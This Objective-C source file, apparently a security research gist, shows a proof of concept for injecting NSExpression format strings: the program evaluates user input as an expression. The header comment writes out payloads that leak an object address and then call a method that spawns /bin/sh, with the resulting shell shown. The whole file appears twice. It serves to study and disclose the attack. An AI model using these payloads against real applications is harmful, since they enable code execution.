aemmitt-ns/predicament.m

## predicament.m
#import <Foundation/Foundation.h>

/*
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld     ').longLongValue"
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld     ").longLongValue' (type: 4)

Value:  105553129238592
Danger: 105553129237664 (offset 928)
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld     ').longLongValue-928,'longValue').dangerous"
Expr: 'FUNCTION(FUNCTION("", "stringByAppendingFormat:" , "%lld     ").longLongValue - 928, "longValue").dangerous' (type: 4)

sh-3.2$ ls
predicament     predicament.m
sh-3.2$
*/

@interface Danger:NSObject {
   double length;
   double breadth;
   double height;
}
@end

@implementation Danger
-(id)init {
  self = [super init];
  return self;
}
-(NSString *) description {
  return @"lol";
}
-(void) dangerous {
  system("/bin/sh");
}
@end

int main(int argc, char *argv[]) {
  if (argc != 2) {
    printf("usage: %s predicate\n", argv[0]);
    exit(1);
  }

  @autoreleasepool {
    NSString *content = [NSString stringWithUTF8String:argv[1]];
    NSMutableDictionary *context = [NSMutableDictionary dictionary];
    Danger *danger = [Danger new];

    NSExpression *expr = [NSExpression expressionWithFormat:content];
    printf("Expr: '%s' (type: %lu)\n\n", expr.description.UTF8String,
      (unsigned long)expr.expressionType);

    NSNumber *value = [expr expressionValueWithObject:nil context:context];
    long long offset = value.longLongValue-(long long)danger;
    printf("Value:  %s\n", value.description.UTF8String);
    printf("Danger: %lld (offset %lld)\n", (long long)danger, offset);
  }

  return 0;
}
	#import <Foundation/Foundation.h>

	/*
	[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
	[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
	Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)

	Value: 105553129238592
	Danger: 105553129237664 (offset 928)
	[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
	Expr: 'FUNCTION(FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue - 928, "longValue").dangerous' (type: 4)

	sh-3.2$ ls
	predicament predicament.m
	sh-3.2$
	*/

	@interface Danger:NSObject {
	double length;
	double breadth;
	double height;
	}
	@end

	@implementation Danger
	-(id)init {
	self = [super init];
	return self;
	}
	-(NSString *) description {
	return @"lol";
	}
	-(void) dangerous {
	system("/bin/sh");
	}
	@end

	int main(int argc, char *argv[]) {
	if (argc != 2) {
	printf("usage: %s predicate\n", argv[0]);
	exit(1);
	}

	@autoreleasepool {
	NSString *content = [NSString stringWithUTF8String:argv[1]];
	NSMutableDictionary *context = [NSMutableDictionary dictionary];
	Danger *danger = [Danger new];

	NSExpression *expr = [NSExpression expressionWithFormat:content];
	printf("Expr: '%s' (type: %lu)\n\n", expr.description.UTF8String,
	(unsigned long)expr.expressionType);

	NSNumber *value = [expr expressionValueWithObject:nil context:context];
	long long offset = value.longLongValue-(long long)danger;
	printf("Value: %s\n", value.description.UTF8String);
	printf("Danger: %lld (offset %lld)\n", (long long)danger, offset);
	}

	return 0;
	}